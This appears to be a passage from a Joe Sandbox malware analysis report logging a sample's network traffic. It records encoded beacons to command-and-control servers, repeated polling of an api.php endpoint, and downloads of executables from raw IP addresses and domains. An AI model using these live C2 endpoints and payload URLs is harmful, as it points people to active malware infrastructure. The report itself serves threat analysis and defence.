                                Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 31 41 31 34 32 43 41 46 42 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6CDF1A142CAFBFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                Source: global trafficHTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                Source: Joe Sandbox ViewIP Address: 31.170.22.127 31.170.22.127
                                Source: Joe Sandbox ViewIP Address: 184.178.172.5 184.178.172.5
                                Source: Joe Sandbox ViewASN Name: CELLCOUS CELLCOUS
                                Source: global trafficHTTP traffic detected: POST /Annie%20E.%20Vinton%20Elementary%20School?heajhvyh=HhGyJapR6QHO0GNqPiJwFkKrnpbzuRzpMpICBW59RiiZWn5BOMbrxA80cyNHFH6KB%2FS9qBjCCf9IE8dNPX1TZw%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Edg/125.0.0.Content-Length: 96Host: bflow-musico.fun
                                Source: global trafficHTTP traffic detected: GET /2v98n72/api.php?id=5B90D6690D158D030B8FA2EBCCB618CBB2D34C8951751EA133958B4E6828EBF3&us=0FC58163515F&mn=5C91D0380F1C&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=1898C939111C HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: 77.232.41.110Cache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /large/see.exe HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: 77.232.41.110Cache-Control: no-cacheCookie: PHPSESSID=8jnj8mpd2k6aeso8ttgu54ij40
                                Source: global trafficHTTP traffic detected: GET /2v98n72/api.php?id=5B90D6690D158D030B8FA2EBCCB618CBB2D34C8951751EA133958B4E6828EBF3&us=0FC58163515F&mn=5C91D0380F1C&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=1898C939111C&tsk=5A HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: 77.232.41.110Cache-Control: no-cacheCookie: PHPSESSID=8jnj8mpd2k6aeso8ttgu54ij40
                                Source: global trafficHTTP traffic detected: GET /large/svchost.exe HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: 77.232.41.110Cache-Control: no-cacheCookie: PHPSESSID=8jnj8mpd2k6aeso8ttgu54ij40
                                Source: global trafficHTTP traffic detected: GET /2v98n72/api.php?id=5B90D6690D158D030B8FA2EBCCB618CBB2D34C8951751EA133958B4E6828EBF3&us=0FC58163515F&mn=5C91D0380F1C&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=1898C939111C&tsk=5C HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: 77.232.41.110Cache-Control: no-cacheCookie: PHPSESSID=8jnj8mpd2k6aeso8ttgu54ij40
                                Source: global trafficHTTP traffic detected: GET /2v98n72/api.php?id=5B90D6690D158D030B8FA2EBCCB618CBB2D34C8951751EA133958B4E6828EBF3&us=0FC58163515F&mn=5C91D0380F1C&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=1898C939111C HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: 77.232.41.110Cache-Control: no-cacheCookie: PHPSESSID=8jnj8mpd2k6aeso8ttgu54ij40
                                Source: global trafficHTTP traffic detected: GET /2v98n72/api.php?id=5B90D6690D158D030B8FA2EBCCB618CBB2D34C8951751EA133958B4E6828EBF3&us=0FC58163515F&mn=5C91D0380F1C&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=1898C939111C HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: 77.232.41.110Cache-Control: no-cacheCookie: PHPSESSID=8jnj8mpd2k6aeso8ttgu54ij40
                                Source: global trafficHTTP traffic detected: GET /2v98n72/api.php?id=5B90D6690D158D030B8FA2EBCCB618CBB2D34C8951751EA133958B4E6828EBF3&us=0FC58163515F&mn=5C91D0380F1C&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=1898C939111C HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: 77.232.41.110Cache-Control: no-cacheCookie: PHPSESSID=8jnj8mpd2k6aeso8ttgu54ij40
                                Source: global trafficHTTP traffic detected: GET /2v98n72/api.php?id=5B90D6690D158D030B8FA2EBCCB618CBB2D34C8951751EA133958B4E6828EBF3&us=0FC58163515F&mn=5C91D0380F1C&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=1898C939111C HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: 77.232.41.110Cache-Control: no-cacheCookie: PHPSESSID=8jnj8mpd2k6aeso8ttgu54ij40
                                Source: global trafficHTTP traffic detected: GET /2v98n72/api.php?id=5B90D6690D158D030B8FA2EBCCB618CBB2D34C8951751EA133958B4E6828EBF3&us=0FC58163515F&mn=5C91D0380F1C&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=1898C939111C HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: 77.232.41.110Cache-Control: no-cacheCookie: PHPSESSID=8jnj8mpd2k6aeso8ttgu54ij40
                                Source: global trafficHTTP traffic detected: GET /2v98n72/api.php?id=5B90D6690D158D030B8FA2EBCCB618CBB2D34C8951751EA133958B4E6828EBF3&us=0FC58163515F&mn=5C91D0380F1C&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=1898C939111C HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: 77.232.41.110Cache-Control: no-cacheCookie: PHPSESSID=8jnj8mpd2k6aeso8ttgu54ij40
                                Source: global trafficHTTP traffic detected: GET /2v98n72/api.php?id=5B90D6690D158D030B8FA2EBCCB618CBB2D34C8951751EA133958B4E6828EBF3&us=0FC58163515F&mn=5C91D0380F1C&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=1898C939111C HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: 77.232.41.110Cache-Control: no-cacheCookie: PHPSESSID=8jnj8mpd2k6aeso8ttgu54ij40
                                Source: global trafficHTTP traffic detected: GET /2v98n72/api.php?id=5B90D6690D158D030B8FA2EBCCB618CBB2D34C8951751EA133958B4E6828EBF3&us=0FC58163515F&mn=5C91D0380F1C&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=1898C939111C HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: 77.232.41.110Cache-Control: no-cacheCookie: PHPSESSID=8jnj8mpd2k6aeso8ttgu54ij40
                                Source: global trafficHTTP traffic detected: GET /2v98n72/api.php?id=5B90D6690D158D030B8FA2EBCCB618CBB2D34C8951751EA133958B4E6828EBF3&us=0FC58163515F&mn=5C91D0380F1C&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=1898C939111C HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: 77.232.41.110Cache-Control: no-cacheCookie: PHPSESSID=8jnj8mpd2k6aeso8ttgu54ij40
                                Source: global trafficHTTP traffic detected: GET /2v98n72/api.php?id=5B90D6690D158D030B8FA2EBCCB618CBB2D34C8951751EA133958B4E6828EBF3&us=0FC58163515F&mn=5C91D0380F1C&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=1898C939111C HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: 77.232.41.110Cache-Control: no-cacheCookie: PHPSESSID=8jnj8mpd2k6aeso8ttgu54ij40
                                Source: global trafficHTTP traffic detected: GET /2v98n72/api.php?id=5B90D6690D158D030B8FA2EBCCB618CBB2D34C8951751EA133958B4E6828EBF3&us=0FC58163515F&mn=5C91D0380F1C&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=1898C939111C HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: 77.232.41.110Cache-Control: no-cacheCookie: PHPSESSID=8jnj8mpd2k6aeso8ttgu54ij40
                                Source: global trafficHTTP traffic detected: GET /2v98n72/api.php?id=5B90D6690D158D030B8FA2EBCCB618CBB2D34C8951751EA133958B4E6828EBF3&us=0FC58163515F&mn=5C91D0380F1C&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=1898C939111C HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: 77.232.41.110Cache-Control: no-cacheCookie: PHPSESSID=8jnj8mpd2k6aeso8ttgu54ij40
                                Source: global trafficHTTP traffic detected: GET /2v98n72/api.php?id=5B90D6690D158D030B8FA2EBCCB618CBB2D34C8951751EA133958B4E6828EBF3&us=0FC58163515F&mn=5C91D0380F1C&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=1898C939111C HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: 77.232.41.110Cache-Control: no-cacheCookie: PHPSESSID=8jnj8mpd2k6aeso8ttgu54ij40
                                Source: global trafficHTTP traffic detected: GET /2v98n72/api.php?id=5B90D6690D158D030B8FA2EBCCB618CBB2D34C8951751EA133958B4E6828EBF3&us=0FC58163515F&mn=5C91D0380F1C&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=1898C939111C HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: 77.232.41.110Cache-Control: no-cacheCookie: PHPSESSID=8jnj8mpd2k6aeso8ttgu54ij40
                                Source: global trafficHTTP traffic detected: GET /2v98n72/api.php?id=5B90D6690D158D030B8FA2EBCCB618CBB2D34C8951751EA133958B4E6828EBF3&us=0FC58163515F&mn=5C91D0380F1C&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=1898C939111C HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: 77.232.41.110Cache-Control: no-cacheCookie: PHPSESSID=8jnj8mpd2k6aeso8ttgu54ij40
                                Source: global trafficHTTP traffic detected: GET /2v98n72/api.php?id=5B90D6690D158D030B8FA2EBCCB618CBB2D34C8951751EA133958B4E6828EBF3&us=0FC58163515F&mn=5C91D0380F1C&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=1898C939111C HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: 77.232.41.110Cache-Control: no-cacheCookie: PHPSESSID=8jnj8mpd2k6aeso8ttgu54ij40
                                Source: global trafficHTTP traffic detected: GET /2v98n72/api.php?id=5B90D6690D158D030B8FA2EBCCB618CBB2D34C8951751EA133958B4E6828EBF3&us=0FC58163515F&mn=5C91D0380F1C&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=1898C939111C HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: 77.232.41.110Cache-Control: no-cacheCookie: PHPSESSID=8jnj8mpd2k6aeso8ttgu54ij40
                                Source: global trafficHTTP traffic detected: GET /2v98n72/api.php?id=5B90D6690D158D030B8FA2EBCCB618CBB2D34C8951751EA133958B4E6828EBF3&us=0FC58163515F&mn=5C91D0380F1C&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=1898C939111C HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: 77.232.41.110Cache-Control: no-cacheCookie: PHPSESSID=8jnj8mpd2k6aeso8ttgu54ij40
                                Source: global trafficHTTP traffic detected: GET /2v98n72/api.php?id=5B90D6690D158D030B8FA2EBCCB618CBB2D34C8951751EA133958B4E6828EBF3&us=0FC58163515F&mn=5C91D0380F1C&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=1898C939111C HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: 77.232.41.110Cache-Control: no-cacheCookie: PHPSESSID=8jnj8mpd2k6aeso8ttgu54ij40
                                Source: global trafficHTTP traffic detected: GET /2v98n72/api.php?id=5B90D6690D158D030B8FA2EBCCB618CBB2D34C8951751EA133958B4E6828EBF3&us=0FC58163515F&mn=5C91D0380F1C&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=1898C939111C HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: 77.232.41.110Cache-Control: no-cacheCookie: PHPSESSID=8jnj8mpd2k6aeso8ttgu54ij40
                                Source: global trafficHTTP traffic detected: GET /2v98n72/api.php?id=5B90D6690D158D030B8FA2EBCCB618CBB2D34C8951751EA133958B4E6828EBF3&us=0FC58163515F&mn=5C91D0380F1C&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=1898C939111C HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: 77.232.41.110Cache-Control: no-cacheCookie: PHPSESSID=8jnj8mpd2k6aeso8ttgu54ij40
                                Source: global trafficHTTP traffic detected: GET /2v98n72/api.php?id=5B90D6690D158D030B8FA2EBCCB618CBB2D34C8951751EA133958B4E6828EBF3&us=0FC58163515F&mn=5C91D0380F1C&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=1898C939111C HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: 77.232.41.110Cache-Control: no-cacheCookie: PHPSESSID=8jnj8mpd2k6aeso8ttgu54ij40
                                Source: global trafficHTTP traffic detected: GET /2v98n72/api.php?id=5B90D6690D158D030B8FA2EBCCB618CBB2D34C8951751EA133958B4E6828EBF3&us=0FC58163515F&mn=5C91D0380F1C&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=1898C939111C HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: 77.232.41.110Cache-Control: no-cacheCookie: PHPSESSID=8jnj8mpd2k6aeso8ttgu54ij40
                                Source: global trafficHTTP traffic detected: GET /2v98n72/api.php?id=5B90D6690D158D030B8FA2EBCCB618CBB2D34C8951751EA133958B4E6828EBF3&us=0FC58163515F&mn=5C91D0380F1C&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=1898C939111C HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: 77.232.41.110Cache-Control: no-cacheCookie: PHPSESSID=8jnj8mpd2k6aeso8ttgu54ij40
                                Source: global trafficHTTP traffic detected: GET /2v98n72/api.php?id=5B90D6690D158D030B8FA2EBCCB618CBB2D34C8951751EA133958B4E6828EBF3&us=0FC58163515F&mn=5C91D0380F1C&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=1898C939111C HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: 77.232.41.110Cache-Control: no-cacheCookie: PHPSESSID=8jnj8mpd2k6aeso8ttgu54ij40
                                Source: global trafficHTTP traffic detected: GET /2v98n72/api.php?id=5B90D6690D158D030B8FA2EBCCB618CBB2D34C8951751EA133958B4E6828EBF3&us=0FC58163515F&mn=5C91D0380F1C&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=1898C939111C HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: 77.232.41.110Cache-Control: no-cacheCookie: PHPSESSID=8jnj8mpd2k6aeso8ttgu54ij40
                                Source: global trafficHTTP traffic detected: GET /2v98n72/api.php?id=5B90D6690D158D030B8FA2EBCCB618CBB2D34C8951751EA133958B4E6828EBF3&us=0FC58163515F&mn=5C91D0380F1C&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=1898C939111C HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: 77.232.41.110Cache-Control: no-cacheCookie: PHPSESSID=8jnj8mpd2k6aeso8ttgu54ij40
                                Source: global trafficHTTP traffic detected: GET /2v98n72/api.php?id=5B90D6690D158D030B8FA2EBCCB618CBB2D34C8951751EA133958B4E6828EBF3&us=0FC58163515F&mn=5C91D0380F1C&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=1898C939111C HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: 77.232.41.110Cache-Control: no-cacheCookie: PHPSESSID=8jnj8mpd2k6aeso8ttgu54ij40
                                Source: global trafficHTTP traffic detected: GET /2v98n72/api.php?id=5B90D6690D158D030B8FA2EBCCB618CBB2D34C8951751EA133958B4E6828EBF3&us=0FC58163515F&mn=5C91D0380F1C&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=1898C939111C HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: 77.232.41.110Cache-Control: no-cacheCookie: PHPSESSID=8jnj8mpd2k6aeso8ttgu54ij40
                                Source: global trafficHTTP traffic detected: GET /2v98n72/api.php?id=5B90D6690D158D030B8FA2EBCCB618CBB2D34C8951751EA133958B4E6828EBF3&us=0FC58163515F&mn=5C91D0380F1C&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=1898C939111C HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: 77.232.41.110Cache-Control: no-cacheCookie: PHPSESSID=8jnj8mpd2k6aeso8ttgu54ij40
                                Source: global trafficHTTP traffic detected: GET /2v98n72/api.php?id=5B90D6690D158D030B8FA2EBCCB618CBB2D34C8951751EA133958B4E6828EBF3&us=0FC58163515F&mn=5C91D0380F1C&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=1898C939111C HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: 77.232.41.110Cache-Control: no-cacheCookie: PHPSESSID=8jnj8mpd2k6aeso8ttgu54ij40
                                Source: global trafficHTTP traffic detected: GET /2v98n72/api.php?id=5B90D6690D158D030B8FA2EBCCB618CBB2D34C8951751EA133958B4E6828EBF3&us=0FC58163515F&mn=5C91D0380F1C&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=1898C939111C HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: 77.232.41.110Cache-Control: no-cacheCookie: PHPSESSID=8jnj8mpd2k6aeso8ttgu54ij40
                                Source: global trafficHTTP traffic detected: GET /2v98n72/api.php?id=5B90D6690D158D030B8FA2EBCCB618CBB2D34C8951751EA133958B4E6828EBF3&us=0FC58163515F&mn=5C91D0380F1C&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=1898C939111C HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: 77.232.41.110Cache-Control: no-cacheCookie: PHPSESSID=8jnj8mpd2k6aeso8ttgu54ij40
                                Source: global trafficHTTP traffic detected: GET /2v98n72/api.php?id=5B90D6690D158D030B8FA2EBCCB618CBB2D34C8951751EA133958B4E6828EBF3&us=0FC58163515F&mn=5C91D0380F1C&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=1898C939111C HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: 77.232.41.110Cache-Control: no-cacheCookie: PHPSESSID=8jnj8mpd2k6aeso8ttgu54ij40
                                Source: global trafficHTTP traffic detected: GET /2v98n72/api.php?id=5B90D6690D158D030B8FA2EBCCB618CBB2D34C8951751EA133958B4E6828EBF3&us=0FC58163515F&mn=5C91D0380F1C&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=1898C939111C HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: 77.232.41.110Cache-Control: no-cacheCookie: PHPSESSID=8jnj8mpd2k6aeso8ttgu54ij40
                                Source: global trafficHTTP traffic detected: GET /2v98n72/api.php?id=5B90D6690D158D030B8FA2EBCCB618CBB2D34C8951751EA133958B4E6828EBF3&us=0FC58163515F&mn=5C91D0380F1C&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=1898C939111C HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: 77.232.41.110Cache-Control: no-cacheCookie: PHPSESSID=8jnj8mpd2k6aeso8ttgu54ij40
                                Source: global trafficHTTP traffic detected: GET /2v98n72/api.php?id=5B90D6690D158D030B8FA2EBCCB618CBB2D34C8951751EA133958B4E6828EBF3&us=0FC58163515F&mn=5C91D0380F1C&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=1898C939111C HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: 77.232.41.110Cache-Control: no-cacheCookie: PHPSESSID=8jnj8mpd2k6aeso8ttgu54ij40
                                Source: global trafficHTTP traffic detected: GET /2v98n72/api.php?id=5B90D6690D158D030B8FA2EBCCB618CBB2D34C8951751EA133958B4E6828EBF3&us=0FC58163515F&mn=5C91D0380F1C&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=1898C939111C HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: 77.232.41.110Cache-Control: no-cacheCookie: PHPSESSID=8jnj8mpd2k6aeso8ttgu54ij40
                                Source: global trafficHTTP traffic detected: GET /2v98n72/api.php?id=5B90D6690D158D030B8FA2EBCCB618CBB2D34C8951751EA133958B4E6828EBF3&us=0FC58163515F&mn=5C91D0380F1C&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=1898C939111C HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: 77.232.41.110Cache-Control: no-cacheCookie: PHPSESSID=8jnj8mpd2k6aeso8ttgu54ij40
                                Source: global trafficHTTP traffic detected: GET /2v98n72/api.php?id=5B90D6690D158D030B8FA2EBCCB618CBB2D34C8951751EA133958B4E6828EBF3&us=0FC58163515F&mn=5C91D0380F1C&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=1898C939111C HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: 77.232.41.110Cache-Control: no-cacheCookie: PHPSESSID=8jnj8mpd2k6aeso8ttgu54ij40
                                Source: global trafficHTTP traffic detected: GET /2v98n72/api.php?id=5B90D6690D158D030B8FA2EBCCB618CBB2D34C8951751EA133958B4E6828EBF3&us=0FC58163515F&mn=5C91D0380F1C&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=1898C939111C HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: 77.232.41.110Cache-Control: no-cacheCookie: PHPSESSID=8jnj8mpd2k6aeso8ttgu54ij40
                                Source: global trafficHTTP traffic detected: GET /2v98n72/api.php?id=5B90D6690D158D030B8FA2EBCCB618CBB2D34C8951751EA133958B4E6828EBF3&us=0FC58163515F&mn=5C91D0380F1C&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=1898C939111C HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: 77.232.41.110Cache-Control: no-cacheCookie: PHPSESSID=8jnj8mpd2k6aeso8ttgu54ij40
                                Source: global trafficHTTP traffic detected: GET /2v98n72/api.php?id=5B90D6690D158D030B8FA2EBCCB618CBB2D34C8951751EA133958B4E6828EBF3&us=0FC58163515F&mn=5C91D0380F1C&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=1898C939111C HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: 77.232.41.110Cache-Control: no-cacheCookie: PHPSESSID=8jnj8mpd2k6aeso8ttgu54ij40
                                Source: global trafficHTTP traffic detected: GET /2v98n72/api.php?id=5B90D6690D158D030B8FA2EBCCB618CBB2D34C8951751EA133958B4E6828EBF3&us=0FC58163515F&mn=5C91D0380F1C&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=1898C939111C HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: 77.232.41.110Cache-Control: no-cacheCookie: PHPSESSID=8jnj8mpd2k6aeso8ttgu54ij40
                                Source: global trafficHTTP traffic detected: GET /2v98n72/api.php?id=5B90D6690D158D030B8FA2EBCCB618CBB2D34C8951751EA133958B4E6828EBF3&us=0FC58163515F&mn=5C91D0380F1C&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=1898C939111C HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: 77.232.41.110Cache-Control: no-cacheCookie: PHPSESSID=8jnj8mpd2k6aeso8ttgu54ij40
                                Source: global trafficHTTP traffic detected: GET /2v98n72/api.php?id=5B90D6690D158D030B8FA2EBCCB618CBB2D34C8951751EA133958B4E6828EBF3&us=0FC58163515F&mn=5C91D0380F1C&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=1898C939111C HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: 77.232.41.110Cache-Control: no-cacheCookie: PHPSESSID=8jnj8mpd2k6aeso8ttgu54ij40
                                Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.81
                                Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.81
                                Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.81
                                Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.81
                                Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.81
                                Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.81
                                Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.81
                                Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.81
                                Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.81
                                Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.81
                                Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.81
                                Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.81
                                Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.81
                                Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.81
                                Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.81
                                Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.81
                                Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.81
                                Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.81
                                Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.81
                                Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.81
                                Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.81
                                Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.81
                                Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.81
                                Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.81
                                Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.81
                                Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.81
                                Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.81
                                Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.81
                                Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.81
                                Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.81
                                Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.81
                                Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.81
                                Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.81
                                Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.81
                                Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.81
                                Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.81
                                Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.81
                                Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.81
                                Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.81
                                Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.81
                                Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.81
                                Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.81
                                Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.81
                                Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.81
                                Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.81
                                Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.81
                                Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.81
                                Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.81
                                Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.81
                                Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.81
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeCode function: 2_2_009CBD30 InternetOpenW,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile,InternetReadFile,2_2_009CBD30
                                Source: global trafficHTTP traffic detected: GET /tmp/1.exe HTTP/1.1Host: foodbook.live
                                Source: global trafficHTTP traffic detected: GET /v2/?request=displayproxies&protocol=socks4&timeout=10000&country=all&ssl=all&anonymity=all HTTP/1.1Host: api.proxyscrape.comConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET /lend/leg222.exe HTTP/1.1Host: 77.91.77.81
                                Source: global trafficHTTP traffic detected: GET /cdn-directory/gold543.exe HTTP/1.1Host: 185.216.214.217
